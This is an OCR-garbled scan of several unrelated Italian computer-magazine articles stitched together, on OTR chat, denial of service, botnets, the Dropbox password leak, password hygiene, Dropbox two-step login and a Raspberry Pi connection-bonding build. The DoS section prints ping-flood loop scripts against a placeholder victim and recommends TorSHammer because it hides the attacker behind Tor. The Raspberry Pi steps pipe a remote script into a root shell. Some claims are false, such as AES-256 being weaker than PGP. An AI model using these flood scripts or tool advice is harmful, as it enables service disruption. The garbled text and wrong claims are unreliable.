svolge questa operazione: potrebbero essere necessa¬ 
ri alcuni secondi prima che la costruzione delle chiavi 
sia completata. 


Conversazioni private 


Quando è tutto pronto, chiudiamo Pidgin e 

_ r avviamolo nuovamente. Ora non dobbiamo 

fare altro che aspettare che un nostro amico compaia 
in linea (ci avrà comunicato il suo nickname o l'indi¬ 
rizzo e-mail) e cliccare su Start private conversation 
dal menu OTR. 


MEGLIO EVITARE DI CHATTARE CON LO SMARTPHONE 

È possibile ottenere una certa privacy nella messaggistica istantanea 
anche sul proprio smartphone, grazie ad applicazioni come Signal. 

Tuttavia dobbiamo ricordare che uno smartphone per definizione 
non è in alcun modo uno strumento anonimo. Le applicazioni come 
Signal non garantiscono alcuna protezione delle comunicazioni, 
piuttosto si limitano a crittografarle, rendendole teoricamente 
invulnerabili alle intercettazioni. Signal è un'applicazione molto 
semplice da utilizzare, che ricorda Telegram. In effetti la struttura 
di base è la stessa, ma la cifratura dei messaggi è molto più forte, 
basandosi su algoritmi come AES-256 e SHA256. Naturalmente, 
questi algoritmi non sono da considerarsi tanto sicuri quanto PGP o 
GPG (la versione open source di PGP), quindi se davvero vogliamo 
inviare messaggi oppure delle e-mail a prova di intercettazione, 
conviene utilizzare un programma di cifratura GPG. 
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ECCO QUANTO È FACILE MANDARE IN TILT I WEB SERVER 


Uno strumento di attacco informatico molto famo¬ 
so è il DoS (Denial of Service), ovvero il rendere in 
qualche modo inattivo un servizio realizzato dalla 
vittima. Per esempio, è possibile "mandare giù" un 
sito Web bloccando l'accesso da parte degli utenti, 
con conseguenze anche economiche a causa della 
perdita di visite e clic (il sito può vendere meno 
pubblicità). Ci si potrebbe chiedere, però, quale 
profitto un malintenzionato possa ottenere da un 
attacco Denial of Service. Un DoS consiste nel satura¬ 
re un certo sito di richieste in modo da non renderlo 
raggiungibile (un po' come quando abbiamo due 
computer in casa che stanno caricando un filmato 
su YouTube o scaricando dal file sharing e notia¬ 
mo che il terzo computer non riesce nemmeno 
ad aprire una pagina Web). È, fondamentalmente, 
puro vandalismo e non si può ottenere un profitto 
da un attacco DoS. Almeno non direttamente. Un 
attacco di questo tipo può mettere fuori uso grandi 
reti di computer e per tale motivo viene spesso usato 
per danneggiare un'azienda o, a volte, un intero 
paese dittatoriale. Qualche anno fa alcuni membri 
di Anonymous avevano minacciato la Corea del 
Nord suggerendo che se il paese dovesse avviare 
una guerra atomica, allora i cracker manderanno 
in tilt i principali server nordcoreani, paralizzando 
di fatto tutte le comunicazioni del paese. Ci sono 
anche diversi casi, più o meno ufficiali, in cui Cina e 
Stati Uniti si sono scontrati su campi di battaglia tele¬ 
matici. Insomma, se abbiamo assistito alla guerra di 
posizione e alla guerra fredda, ora stiamo assistendo 
alla guerra informatica! 

L'era della cyber guerra 

Possiamo dire che dal punto di vista storico, pro¬ 
babilmente il 1900 verrà ricordato proprio come 
il secolo che ha portato alla modifica dei conflitti 
da guerre di campo a episodi di trincea, conflitti 
"freddi"e infine telematici. Del resto ricordiamo che 
l'informatica è nata con le guerre, per la precisione 
con la seconda guerra mondiale, perché gli inglesi 
avevano bisogno di calcolatori potenti per decifrare 
le comunicazioni segrete tedesche. Tornando alla 


questione del DoS, come riesce il pirata ad eseguire 
un attacco di questo tipo? La realizzazione è a dir 
poco banale: basta inviare molti pacchetti Internet 
al server che si vuole mandare in tilt. Esistono diversi 
modi per farlo, ma il più facile di tutti è usare dei 
pacchetti ICMP (quelli inviati dal comando ping 
per controllare che un sito esista). È un metodo 
molto comodo perché il comando ping esiste sia 
su sistemi Windows sia Unix, e quindi il cracker può 
essere certo di trovarlo sul sistema infettato. Se il 
pirata ha attaccato un sistema Windows userà uno 
script batch di questo tipo: 

:Beginning 

ping -n 7 www.sitovittima.it 
GOTO Beginning 

Se invece ha infettato un sistema Unix, potrà sfrut¬ 
tare questo altro script: 

while true 
do 

ping-ci www.sitovittima.it 
done 

In entrambi i casi verrà eseguito un ciclo infinito 
che ad ogni iterazione invia un pacchetto ICMP. 

Un DoS distribuito 

Bisogna comunque considerare che ormai i mo¬ 
derni server Web sono in grado di gestire molte 
più richieste di quante un singolo computer sia in 
grado di rivolgergli. Per questo motivo il pirata usa 
una botnet: in questo modo avrà tanti computer a 
disposizione per inviare richieste al server che vuole 
mettere KO. Questa tecnica viene detta Distribu- 
ted Denial of Service (DDoS), ovvero negazione 
del servizio distribuita. Il DDoS ha anche un altro 
vantaggio per il criminale: se le forze dell'ordine 
dovessero riuscire a identificare gli indirizzi IP dai 
quali è partito l'attacco, non sarebbero comunque 
in grado di capire quale di questi è il vero cracker e 
quali invece sono solo ignare vittime della botnet. 


IL GRIMALDELLO VIRTUALE 
PREFERITO DAI PIRATI 


Per un "professionista" che 
voglia davvero lanciare 
un attacco DoS o DDoS lo 
strumento più affidabile è 
probabilmente il program¬ 
ma TorSHammer (sezione 
Speciali del Win DVD-Rom). 
Il vantaggio di questo tool 
è la sua capacità di lavorare 
attraverso la rete Tor, ren¬ 
dendo dunque più difficile 
l'individuazione dei compu¬ 


ter responsabili dell'attacco. 
TorSHammer può essere in¬ 
stallato, senza eccessive dif¬ 
ficoltà, anche sui computer 
di una botnet ed è capace 
di inviare molti pacchetti. 
È importante sapere che gli 
attacchi DoS sono molto ri¬ 
schiosi per un pirata, sia per¬ 
ché possono risultare poco 
fruttuosi se i pacchetti in¬ 
viati non sono abbastanza, 


sia perché è piuttosto facile 
per le vittime e per gli ope¬ 
ratori telefonici individuare 
il responsabile dell'attacco. 
Soprattutto se si usano stru¬ 
menti privi di ogni protezio¬ 
ne come i programmi LOIC, 
HOIC, e XOIX. TorSHammer 
è l'unico, tra i vari program¬ 
mi per il DoS, che offre una 
minima forma di protezione 
per il pirata. 


Che cos'è una botnet... 

Ecco perché, sempre più spesso, le cronache parlano 
di botnet, cioè delle reti di computer controllati da 
un malintenzionato. Quello che succede, in pratica, è 
che il pirata ottiene il controllo completo sui PC che 
è riuscito ad infettare con un particolare malware 
di sua invenzione (chiamato "programma bot") 
e può inviare loro dei comandi oppure ottenere 
da essi informazioni. Gli obiettivi possono essere 
fondamentalmente due: il primo è riuscire a rubare 
dati sensibili (numeri di carte di credito, password, 
ecc...) dai suoi bot (detti anche zombie o slave). In 
questo caso vengono infettati pochi bot per volta, 
per comodità del pirata (che è anche detto botma- 
ster). L'altro obiettivo può essere quello di sfruttare 
tanti computer bot per eseguire operazioni illegali in 
modo da amplificare l'effetto: è il caso, ad esempio, 
del Denial of Service subito da Spamhouse (se ad 
inviare pacchetti fosse stato un solo computer non 
ci sarebbero stati problemi). La costruzione della 
botnet avviene in due fasi: una preparativa e una 
pratica. In quella preparativa, il cracker scrive un 
programma che gli consente di avere il controllo 
su un computer qualsiasi: questo programma bot 
deve poter comunicare con il pirata (e viceversa), 
quindi la soluzione migliore è usare una rete IRC. 
IRC è una chat molto facile da usare, quindi il cra¬ 
cker può decidere di collegarsi al programma bot 
tramite IRC come se si trattasse di una normale 
persona. Successivamente deve fare in modo che 
il programma si installi nel computer di una vittima 
(per esempio inviandoglielo via e-mail come alle¬ 
gato). Infine può avviare contemporaneamente i 
programmi DOS su tutti i PC della botnet e dare così 
il via al suo attacco verso il server vittima. 
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Sul Web c’è un supermarket di 
account personali. Scopri se il 
tuo è stato compromesso! 


I n un mondo informatizzato come quel¬ 
lo moderno il nostro alter ego digitale è 
rappresentato dai vari account di cui di¬ 
sponiamo presso i siti più importanti. Le e- 
mail, i forum, l'archiviazione cloud, i negozi 
on-line: ciascuno di questi servizi richiede 
delle credenziali di accesso, tipicamente 
un nome utente e una password. La sicu¬ 
rezza delle nostre identità digitali dipende, 
dunque, dalle password che scegliamo. Ma 
ricordarne tante tutte diverse risulta difficile 
e, soprattutto quando si hanno tanti account, 
la tentazione di utilizzare sempre la stessa 
chiave d'accesso per diversi servizi è mol¬ 
to forte. Tuttavia questa decisione è molto 
pericolosa: infatti, nel caso in cui un pirata 
riuscisse a scoprire una nostra password, 
proverebbe immediatamente a collegare gli 
altri nostri account (per esempio, se scopre 
la password della nostra e-mail può leggere 
i messaggi ricevuti dai siti Web e scoprire a 
quali di essi siamo registrati) e tenterebbe di 
entrare in essi utilizzando la stessa password 
che ha appena scoperto. 

Il caso Dropbox 

L'ultima vittima eccellente dei colossali furti 
di password è il servizio di cloud Storage 
Dropbox (www.dropbox.com). Sul sito leak- 
base.com sono stati registrati ben 68 milioni 
di account Dropbox ai quali sarebbe stata 
rubata la password. Il furto, però, è avvenuto 
nel 2012, quindi gli account creati dopo il 
2012 sono automaticamente esclusi da questo 
massiccio furto. I gestori di Dropbox hanno 
confermato che i 60 milioni di account sono 
effettivamente stati crackati, ma visto che è 
passato molto tempo è molto probabile che 
alcuni degli account non siano più esistenti 
o comunque abbiano una password diversa 
rispetto a quella di quattro anni fa. Sul sito 
leakbase si può verificare se il proprio ac- 
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Scopriamo se siamo stati piratati 

Ecco come eseguire una ricerca nel database on-line degli account rubati. Solo così potremo scoprire se 
il nostro account Dropbox è stato violato. Speriamo, ovviamente, di non trovare la nostra e-mail nella lista! 



^ Un archivio Web da paura! 

Gli account piratati di Dropbox sono stati inseriti, assieme a quelli di 
altri siti Web, nel database di Leakbase. L’archivio, che contiene milio¬ 
ni di account, può essere consultato tramite la pagina Web https://leakbase.pw/ 
landing.php. Prima di accedere alla pagina vera e propria, il nostro indirizzo IP 
viene controllato per impedirne l'uso tramite rete Tor, quindi siamo identificabili. 


^ Una verifica per accedere airarchivio 

È possibile eseguire la ricerca dell’account inserendo il nostro nome 
di login o più semplicemente l’e-mail associata all’account Dropbox. 
Per questioni di sicurezza il sito richiede lo svolgimento di un captcha visivo: 
le immagini da selezionare sono tre, seguendo l'indicazione che riceviamo. In 
questo modo il database non può essere consultato da robot automatizzati. 



^ Abbiamo trovato gualche risultato? 

Eseguita la ricerca, i risultati appaiono aliatine della pagina Web. Natural¬ 
mente Leakbase indica diversi account relativi all’indirizzo e-mail da noi 
specificato ai quali sia stata rubata la password, non solo Dropbox. Per motivi di 
“riservatezza” il sito ci indica semplicemente il numero di account che ha trovato 
nel suo database, senza offrire ulteriori dettagli. 


^ Tutti i dettagli dell’account compromesso 

^ Per poter avere maggiori informazioni sugli account identificati, è neces¬ 
sario registrarsi al sito e pagare un abbonamento. Il prezzo ovviamente 
varia a seconda del tempo per il quale vogliamo poter accedere ai risultati. Que¬ 
sta precauzione serve a scoraggiare i pirati, visto che eseguendo un pagamento 
si finisce inevitabilmente per essere identificabili in modo univoco. 


count è stato effettivamente crackato, ma le 
password rubate non sono comunque visibili 
pubblicamente, per ovvi motivi di sicurezza. 

Le tecniche di attacco 

Ma come fa un pirata a scoprire una delle 
nostre password? Esistono diverse possi¬ 
bilità, ma le due più comuni sono quasi 
banali: può provare tutte le combinazioni 
possibili di lettere e numeri fino a trovare 
quella giusta oppure può con qualche truc¬ 
co convincere noi stessi ad inviargliela. La 
prima possibilità è il cosiddetto brute force: 
il metodo è di per sé infallibile, perché è 


ovvio che provando tutte le combinazioni 
possibili prima o poi si trova quella giusta, 
a prescindere da quanto complicata possa 
essere la password. Tuttavia è un metodo 
che richiede molto tempo: ecco, dunque, 
che la robustezza della password è fonda- 
mentale. Infatti, una password troppo corta 
e facile, come "1234” oppure "alligatore3", 
viene scoperta molto rapidamente da un 
meccanismo di brute force, soprattutto se 
abbinato ad un dizionario (significa che 
prima di tentare le combinazioni casuali 
si provano delle combinazioni di numeri 
e parole molto comuni). 


Ingegneria sociale 

La seconda opzione è più frequente di quanto 
si possa immaginare e prevede di perpetrare 
il furto delle credenziali utilizzando attacchi 
di tipo phishing. In poche parole, usando 
sofisticate tecniche di ingegneria sociale, i 
malfattori provano a convincerci a fornire loro 
i nostri dati personali. Sembra impossibile, 
eppure negli ultimi tempi questa particolare 
tecnica di attacco sta dando molte "soddisfa¬ 
zioni" ai pirati! Ci è mai capitato di ricevere 
un’e-mail da parte di qualcuno che fingeva 
di essere il gestore di uno dei siti Web a cui 
siamo registrati, nella quale veniva chiesto ► 
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SONO A RISCHIO ANCHE LE PASSWORD 
DI ACCESSO A WINDOWS 


Non solo i servizi on-line come Dropbox, ma anche 
i nostri PC sono da sempre protetti da password. 
Purtroppo le chiavi di accesso di Windows, il siste¬ 
ma operativo più diffuso al mondo, sono sempre 
state piuttosto fragili. Windows NT (il moderno 
kernel), infatti, memorizza le password sotto forma 
di hash, ma esistono algoritmi che permettono di 
scoprire o modificare la combinazione in pochi 
secondi. Finora è sempre stato necessario utiliz¬ 
zare delle pendrive avviabili con il programma 
https://pogostick.net/~pnh/ntpasswd, quindi si 
doveva riavviare il computer. Ma ora il ricercatore 
Rob Fuller ha sviluppato un metodo basato su un 
piccolo computer che si può collegare al PC da 
cracckare tramite una porta USB e che è in grado 
scoprire la maggioranza delle password in circa 20 


secondi. Questo significa che se qualcuno si assenta 
dalla scrivania, bloccando lo schermo del PC, un 
malintenzionato potrebbe comunque scoprire 
la password in meno tempo di quanto è 
necessario per prendersi un caffè. 

Per fortuna i rischi sono co¬ 
munque limitati, visto che 
gli unici interessati 
ad un attacco di 
questo tipo sono 
gli eventuali col¬ 
leghi di lavoro: un 
vero malintenzionato ru¬ 
berebbe direttamente l'intero 
computer e ne controllerebbe >• 
il contenuto con calma. 



di rispondere indicando nome utente e pass¬ 
word per svolgere una qualche forma di test? 
Probabilmente abbiamo cestinato immedia¬ 
tamente il messaggio di posta elettronica 
in questione, riconoscendo la truffa. Ma se 
questo tipo di e-mail è ancora in circolazione 
significa che ci sono ancora molte persone 
che "abboccano” alla trappola: nessun tipo 
di truffa continua ad essere perpetrata se 
non produce frutti. Combattere questo tipo 
di furti di password è abbastanza semplice: 
basta ricordarsi sempre che nessun gestore 
di un sito Web (che sia quello della nostra 
banca, dell'assicurazione o del negozio on- 
line) ci chiederà mai di indicare le nostre 
credenziali via e-mail o su siti Web diversi 
dal suo sito ufficiale 

Correre ai ripari 

Se dunque per difendersi da attacchi di tipo 
phishing servono solo il nostro buon senso e la 
massima attenzione ad aprire e-mail sospette 
o cliccare su link non verificati presenti nei 
messaggi stessi (anche nel mondo virtuale di 
Internet vale il detto che non si devono mai 
accettare caramelle dagli sconosciuti...), co¬ 
me possiamo scegliere una password a prova 
di brute force? La regola è di scegliere una 
password molto lunga, perché maggiore è la 
lunghezza della password maggiore è il tempo 
necessario per scoprirla tramite brute force. 

Facciamoci furbi 

Il problema delle password lunghe è che 
sono difficili da ricordare. Esiste però un 
semplice trucco: basta utilizzare delle frasi. 
Le frasi sono molto più facili da ricordare 
di singole parole, perché il nostro cervello 
ricorda facilmente il loro significato. Inoltre, 


è molto facile che una frase risulti lunga, e 
scegliendole con attenzione è possibile che 
la frase contenga lettere maiuscole e numeri. 
Frasi con diverse parole sono anche poco 
vulnerabili agli attacchi a dizionario, che 
solitamente non riescono a mettere assie¬ 
me più parole declinandole correttamente. 
Per esempio, le frasi "Armavirumquecano” 
oppure "QuelramodellagodiComo” o ancora 
"525600minutes525600moments” sono delle 


ottime password: facili da ricordare e molto 
difficili da identificare con il brute force. Per 
scoprire, tramite brute force, una password da 
10 caratteri sono necessari degli anni anche 
utilizzando più di un processore alla volta. 
Con frasi di lunghezza adeguata possiamo 
dunque essere sicuri che nessuno scoprirà la 
nostra password, a meno che naturalmente 
non siamo noi stessi a commettere l’errore di 
comunicargliela! 


COME NON FARSI RUBARE LA PASSWORD! 


Nessuno può considerarsi al 
sicuro da un furto di password 
ed è per questo motivo che 
è importante prendere delle 
semplici precauzioni per evi¬ 
tare che ciò possa crearci grandi 
problemi. 

1. Creare diversi indirizzi 
e-mail 

Uno da non comunicare a nes¬ 
suno e da utilizzare solo per 
iscriversi a siti Internet impor¬ 
tanti (Amazon, eBay, PayPal 
eccetera); un altro da usare 
per iscriversi a siti di vario ge¬ 
nere (blog, forum on-line...); 
e almeno un terzo indirizzo da 
comunicare ad amici e colleghi 
per mantenersi in contatto. In 
questo modo, una eventuale 
perdita di credenziali degli ac- 
count più "pubblici" non intac¬ 
cherà realmente la sicurezza di 
ciò che conta davvero. 


2. Impostare un numero di 
telefono per recuperare la 
password 

Un pirata che riesce a scoprire la 
password di un nostro account 
importante per prima cosa la 
modifica, in modo da impedir¬ 
ci l'accesso. Solitamente, però, 
non può modificare il numero 
di telefono associato all'account 
e grazie ad esso potremo recu¬ 
perare l'account stesso. 

3. Crittografare i file 
importanti 

Se siamo abituati a usare servizi 
come Google Drive per caricare 
on-line dei file confidenziali, ci 
conviene crittografarli prima di 
inviarli su Internet (meglio se 
con un programma come Cryp- 
tophane: www.winmagazine.it/ 
link/3611 ). In questo modo, un 
eventuale malintenzionato non 
potrebbe comunque leggerli. 


4. Non archiviare mai le pas¬ 
sword in chiaro 

Qualcuno ha l'abitudine di in¬ 
viarsi tramite e-mail dei mes¬ 
saggi contenenti le password di 
accesso ai siti ai quali si registra. 
È una pessima idea! Se qualcuno 
riuscisse ad entrare nell'account 
e-mail avrà accesso automatico 
anche agli altri siti. 

5. Non caricare sul Web di 
tutto e di più 

Ricorda che ciò che carichi sul 
Web non è più da considerare 
privato (alcune tue immagini po¬ 
trebbero diventare di pubblico 
dominio contro il tuo volere e un 
tuo stato "privato" su Facebook 
potrebbe essere letto da altri). I n 
altre parole, se una cosa è privata 
non caricarla sul Web, a prescin¬ 
dere dalle promesse di garanzia 
della privacy del sito Web o del 
gestore di Storage on-line. 
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Account Dropbox a prova di ladri 

Per mettere al sicuro il nostro spazio cloud è opportuno abilitare la doppia autenticazione. Potremo così 
impedire il furto della password associando l’account al nostro numero di telefono. 



^ Impostazioni nascoste 

Per cominciare, colleghiamoci col browser 
al sito www.dropbox.com ed entriamo con le 
nostre credenziali. Eseguito il login, avremo a dispo¬ 
sizione un menu a discesa che appare cliccando 
sul nostro nome. Tra le voci disponibili quella che ci 
interessa è ovviamente Impostazioni , perché dob¬ 
biamo reimpostare l'autenticazione dell’account. 



^ Con SMS oppure app? 

^ La conferma in due passaggi si fa con l’invio 
di un codice di sicurezza al nostro telefono o 
allo smartphone. Ora Dropbox vuole sapere come pre¬ 
feriamo ricevere il codice: può avvenire tramite SMS 
oppure con una apposita app. Gli SMS sono universa¬ 
li, mentre le app funzionano soltanto sugli smartphone 
per cui sono state progettate. 



^ lin secondo telefono 

È piuttosto facile perdere un telefono, o 
magari anche romperlo e non averne uno 
sostitutivo in tempi brevi. Dropbox lo sa, quindi ci 
offre la possibilità di indicare un secondo nume¬ 
ro di telefono, nel caso in cui ii principale non sia 
utilizzabile. Se non intendiamo utilizzare un nume¬ 
ro di telefono di riserva, possiamo semplicemente 
lasciare la casella vuota e cliccare Avanti. 



^ Una scheda di sicurezza 

La pagina delle impostazioni è divisa in tre 
diverse schede: quella che ci interessa è la 
scheda Sicurezza. Da qui potremo modificare l’attuale 
password e ci verranno mostrati anche i browser da cui 
è stato fatto accesso (se troviamo qualche browser che 
non ci appartiene, forse ci hanno rubato la password). 
Ma possiamo anche attivare la verifica in due passaggi. 
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-w Serve il numero di telefono 

Entrambi i metodi offerti da Dropbox sono com¬ 
pletamente gratuiti. Naturalmente dobbiamo 
indicare il nostro numero di telefono: sarà a questo 
numero che verrà inviato il codice, per esempio sotto 
forma di SMS. Dopo avere inserito il nostro numero, 
assicurandoci che sia selezionato il prefisso nazionale 
corretto, possiamo premere il pulsante Avanti. 



± I codici di backup 

g Nella malaugurata ipotesi in cui dovessimo 
dimenticare la password e perdere il tele¬ 
fono, non avremmo più modo di accedere all’ac- 
count Dropbox. Per evitarlo, ci vengono forniti dieci 
diversi codici di backup. Per recuperare l’accesso 
all’account, nel caso, ci verrà richiesto l’inserimen¬ 
to di uno qualsiasi di questi codici. Dobbiamo quin¬ 
di memorizzarli in un posto sicuro. 



^ Attiviamo la doppia verifica 

Per attivare la verifica in due passaggi basta 
cliccare sul link fai click per attivare nella 
sezione relativa proprio alla verifica in due passaggi. 
Prima di procedere, per ovvi motivi di sicurezza, ci vie¬ 
ne richiesto nuovamente l'inserimento della password 
dell’account. Basta inserirla e premere il pulsante 
Avanti per procedere al passo successivo. 



^ Ecco il primo codice 

Dropbox controlla immediatamente il nume¬ 
ro: ci invia infatti un codice, simile a quelli che 
dovremo inserire per accedere all’account. Appena ci 
arriva l’SMS, copiamo il codice di sei cifre nell’appo¬ 
sita casella di testo nella schermata di login al sito. Il 
codice va copiato senza lo spazio (neil’SMS per facili¬ 
tare la lettura il codice è diviso a metà da uno spazio). 



^ Il nostro account è al sicuro 

0 La procedura è terminata: appena clicchia- 
mo sul pulsante Attiva verifica in due pas¬ 
saggi, la doppia autenticazione diventa effettiva. 
Per provarla non dobbiamo fare altro che eseguire 
il logout e poi provare nuovamente il login al nostro 
account Dropbox. Se tutto funziona correttamen¬ 
te, ci arriverà un codice numerico sul telefono, che 
inserimento dopo la password di accesso. ■ 
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router 

ottica 


Costruisci il dispositivo magico 
che ti permette di bypassare 
i limiti imposti sulla tua ADSL 


Cosa ci 
occorre 


MINI PC LINUX 

RASPBERRY 
PI 3 

Quanto costa: € 38,00 
Sito Internet: www. 
raspberrypi.org 


ALIMENTATORE PER 
RASPBERRY PI 3 


RASPBERRY 
PI UNIVERSAL 
POWER SUPPLY 


Quanto costa: € 8,90 
Sito Internet: https:// 
shop.pimoroni.com 


SCHEDA DI MEMORIA 
MICROSD 


SAMSUNG 
MB-MC32DA 
32 GB 


Quanto costa: € 12,00 
Sito Internet: 

www.amazon.it 


SOFTWARE PER CREARE 
MICROSD AWIABILE 

WIN 32 DISK 
IMAGER 

Lo trovi si ✓'DVD 

Sito Internet: 

www.winmagazine. 

it/link/3613 


SISTEMA OPERATIVO 
PER RASPBERRY PI 3 

RASPBIAN 

JESSIE 

Quanto costa: Gratuito 
Sito Internet: 

www.raspberrypi.org 


R iuscire a navigare o scaricare ad una 
velocità superiore è il sogno nascosto 
di ognuno di noi. Dopotutto la banda 
Internet non basta mai: pur avendo a dispo¬ 
sizione la velocità di un’ADSL o la potenza di 
una fibra ottica, il numero sempre maggiore 
di dispositivi connessi all’interno delle mura 
domestiche (PC, smartphone, tablet, conso¬ 
le, Smart TV) non ci permette di ottenere il 
massimo dalla nostra connessione a Internet. 
Ciò perché mentre magari cerchiamo di sca¬ 
ricare un file, qualcuno dei nostri familiari 
è in salotto a guardare un film in streaming 
su Netflix o altri servizi on-demand. Quante 
volte ci siamo ritrovati di fronte a uno scenario 
simile? Ma oggi una soluzione definitiva c’è e 
metterla in pratica non ci costa nulla, o quasi. 

La fibra non serve più! 

Abbiamo sottoscritto un piano mobile che ci 
permette di navigare dal tablet o dal telefoni¬ 
no anche quando non abbiamo a disposizione 
la connettività di una rete Wi-Fi? Abbiamo 
a disposizione una chiavetta Internet che 
ci permette di navigare in mobilità? Se la 
risposta a questi due quesiti è affermativa, 
siamo a cavallo. Quello che faremo, infatti, 
è realizzare un "dispositivo magico” (utiliz¬ 
zando un Raspberry Pi 3) che ci permette di 
“unire" la potenza della nostra connessione 
ADSL a quella di una Internet key e del nostro 
fedele smartphone Android (sfruttando le 
funzionalità di tethering Wi-Fi). Solo così 
saremo in grado di realizzare una sorta di 
“super router” capace di farci navigare a ve¬ 
locità tripla, proprio come se avessimo una 
velocissima fibra ottica, e dire finalmente 
addio a lunghi tempi di attesa durante il 
download di un file o il caricamento di un 
film in streaming! Cos'altro aspettiamo? Rim¬ 
bocchiamoci subito le maniche ed iniziamo 
questa nuova avventura. 
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ROUTER 

ADSL/FIBRA 


SMARTPHONE CON 
TETHERING WI-FI 


COMPUTER 

COMPUTER 


COMPUTER 


ECCO COME FUNZIONA 
IL NOSTRO DISPOSITIVO 

Raspberry Pi 3 è collegato al router ADSL tramite 
un cavo Ethernet. Sfruttando la connettività Wi-Fi 
integrata del mini PC è inoltre connesso senza fili allo 
smartphone Android (quest'ultimo condivide la sua 
connessione 4G). Infine, ad uno degli ingressi USB 
disponibili sul Raspberry Pi 3 è collegata una Internet 
key. Nonostante la presenza di un router ADSL nella 
LAN, sarà il mini PC a fornire la connettività a Internet 
a tutti altri dispositivi (PC, telefonini, tablet, TV) con¬ 
nessi alla rete locale, gestendo la banda disponibili in 
maniera del tutto trasparente all'utente. 


13 Tutto in una microSD 



Per realizzare la nostra super-connessione dobbiamo installare su una scheda di memoria 
Raspbian Jessie, il sistema operativo per il Raspberry Pi 3 adatto allo scopo. Vediamo come fare. 



^ Scarichiamo il sistema operativo 

Dal nostro computer connesso a Internet awiamo il brow- 
ser, raggiungiamo la pagina Web www.winmagazine.it/ 
link/3612 e facciamo clic sul pulsante Download ZIP in corri¬ 
spondenza di Raspbian Jessie. Attendiamo quindi che l’archivio 
compresso venga scaricato nell’hard disk. 

Win32 Disk Imeger — 

Fde mmagne 

io-UB/Do.\niodds,iRASPeERRY/2016-0S-27T8S0tHari-}ejfre.nig I 

Copy O nash MD5: 

Progresso 


versori: 0.9.5 

Annulla 

legg. 

Soavi 


^ La MicroSD è pronta all’uso! 

A questo punto inseriamo la scheda microSD nel lettore di 
memory card del PC (o in uno esterno) e attendiamo che la 
memoria venga riconosciuta. Dal menu a tendina Dispositivo sele¬ 
zioniamo l’unità associata alla scheda microSD (nel nostro caso E:) 
e confermiamo la scrittura con un clic sul pulsante Scrivi. 



± Il software per “montare” l’OS 

Al termine scompattiamo il file ZIP e preleviamo dal Win DVD 
il software Win32Disklmager: quindi, installiamolo e avvia¬ 
molo. Premiamo sul pulsante Sfoglia e raggiungiamo il percorso 
nel quale abbiamo estratto Raspbian Jessie. Confermiamo con un 
clic su Apri. 



^ Avviamo il nostro Raspberry 

^ Ad operazione conclusa rimuoviamo la scheda microSD dal 
lettore e inseriamola nello slot del Raspberry Pi 3. Colleghia¬ 
mo quest’ultimo ad un monitor (tramite la porta HDMI), ad una tastie¬ 
ra, ad un mouse USB e al suo alimentatore. L’avvio di Debian Jessie 
avverrà in automatico entro qualche secondo. 


GLI ACCESSORI 
GIUSTI PER 
POTENZIARE IL 
RASPBERRY PI 



NEON MICROSD 
ADAPTER 

Un adattatore che 
troveremo molto utile per 
poter leggere il contenuto 
delle schede di memoria 
microSD e microSDHC 
anche nei computer che 
dispongono di lettori 
compatibili unicamente con 
le schede SD. 
Quanto costa: €1,50 
Sito Internet: 
www.amazon.it 



TRANSCEND 

TSRDF5W 

Indispensabile nel caso 
in cui il nostro PC non sia 
provvisto di un lettore di 
schede di memoria. Dotato 
di interfaccia USB 3.0 
(compatibile con USB 2.0), 
supporta diversi tipi di card 
(SDHC UHS-I, SDXC UHS-I, 
micro SDHC UHS-I, micro 
SDXC UHS-I) e dispone di 
indicatore LED durante il 
trasferimento dei dati. 
Quanto costa: € 7,39 
Sito Internet: 
www.amazon.it 
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SOFTWARE 

SEMPRE 

AGGIORNATO 


Al Passo B6 abbiamo 
scoperto il comando che 
ci permette di aggior¬ 
nare Dispatch-proxy. Al 
momento della prima 
installazione con ogni 
probabilità disporremo 
del pacchetto più ag¬ 
giornato del software. 
Gli sviluppatori di 
Dispatch-proxy rilascia¬ 
no nuovi aggiornamenti 
con una certa costanza: 
dunque, è bene lanciare 
il comando di aggiorna¬ 
mento (sudo npm upda¬ 
te -g dispatch-proxy) al¬ 
meno una volta al mese. 
Solo così saremo certi 
di utilizzare sempre la 
versione più aggiornata 
del software. 



COS'È NODEJS? 

Durante l'installazione 
di tutto il software 
necessario ci siamo im¬ 
battuti anche in Node. 
js. Ma di cosa si tratta? 
Essenzialmente è un 
framework utilizzato 
dai programmatori e 
che consente il funzio¬ 
namento di Dispatch- 
proxy, il software che 
si occuperà di "unire" 
le connessioni ad In¬ 
ternet fra loro. Poiché 
Dispatch-proxy è scritto 
inJava, per il suo cor¬ 
retto funzionamento 
è necessario che Rasp- 
bian sia equipaggiato 
anche di Node.js. 


13 1 tool per sfrecciare in Rete 

Prima di “unire” tra loro l’ADSL, il 4G dello smartphgone e il 3G della Internet Key, installiamo 
i software fondamentali che smisteranno il nostro traffico Internet su una delle tre connessioni. 


File Edit Tabs Help 


piQraspberrypi: $ sudo apt-get update 

Get: 1 http://mirrordirector.raspbi an.org 
Get:2 http://archive.raspberrypi.org ]ess 
Get:3 http://mirrordìrector. raspbian.org 
Get:4 http://archive.raspberrypi.org jess 
Get:5 http://archive.raspberrypi.org jess 
Ign http://archive.raspberrypi.org jessie 
Ign http://archive.raspberrypi.org jessie 

. t . . . . t I 


x Aggiorniamo la distro Raspbian 

Colleghiamo il Raspberry Pi al Web (utilizzando un cavo Ether¬ 
net) e avviamo il terminale (terza icona in alto a sinistra dell’in¬ 
terfaccia grafica principale di Raspbian). Da qui digitiamo il comando 
sudo apt-get update seguito da Invio per aggiornare tutti i pacchetti 
software disponibili. 



^ ... e installiamolo sul Rasoberrv! 

È arrivato il momento di installare il file Node.js in Raspbian. 

Per farlo, digitiamo semplicemente da terminale il comando 
sudo apt-get instali -y node.js e, come al solito, confermiamo pre¬ 
mendo Invio. Al termine dell’operazione il software basilare per il fun¬ 
zionamento del nostro load balancer sarà pronto all’uso. 



^ Il tool per gestire le tre connessioni 

g Tutto è pronto per installare il nostro load balancer: nel nostro 
caso abbiamo scelto Dispatch-proxy. Per farlo, digitiamo 
sudo npm instali -g dispatch-proxy e confermiamo con Invio. I pac¬ 
chetti del software verranno quindi scaricati e installati sul Raspberry 
Pi 3 (l'operazione dura una manciata di secondi). 



^ Scarichiamo il file di configurazione... 

Terminata questa fase, digitiamo il comando curi -sL https:// 
deb.nodesource.com/setup_4.x ] sud -E bash - conferman¬ 
do con Invio. Verrà scaricato il file Node.js: l'operazione può durare 
da qualche secondo a qualche minuto a seconda della velocità della 
nostra connessione a Internet. 


riuutf-grdteiui* ib nuue-yyp nuue-infierì 

node-Iru-cache node-minimatch node-mk 
node-normalize-package-data node-npml 
node read package json node retry nod 
node-sigmund node-slide node-tar node 
